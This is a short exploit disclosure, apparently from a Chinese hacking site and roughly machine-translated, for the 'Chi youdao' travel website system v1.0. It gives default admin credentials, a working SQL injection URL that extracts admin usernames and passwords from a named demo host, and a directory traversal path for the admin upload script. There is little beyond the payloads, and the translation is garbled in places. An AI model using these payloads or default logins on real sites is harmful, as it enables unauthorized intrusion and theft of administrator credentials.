Chi youdao professional travel system v1. 0 injected and the column directory vulnerability-vulnerability warning-the black bar safety net

2011-08-02T00:00:00
ID MYHACK58:62201131427
Type myhack58
Reporter 佚名
Modified 2011-08-02T00:00:00

Description

|

“Chi youdao”professional travel site system is wise to have team professional development, for the current tourism platform for powerful features developers! Back office management The default background path:/admin/login. asp The default administrator: user:admin Default password: psw:1 2 3 4 5 6 下载 地址 :http://down.chinaz.com/soft/30295.htm Demo Url:http://will2011. w701. hzdemo. cn/ SQL EXP Tset:

http://will2011.w701.hzdemo.cn/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,1 0,1 1,1 2,1 3,1 4,1 5 from admin

!

Traverse the directory:

/admin/do/admin_uploadfile. asp? id=1&dir=../..

! http://will2011.w701.hzdemo.cn/%61%64%6D%69%6E%2F%64%6F%2F%70%69%63%2F%32%30%31%31%38%31%30%33%37%35%37%32%39%31%2E%73%77%66

Author: Mr. DzY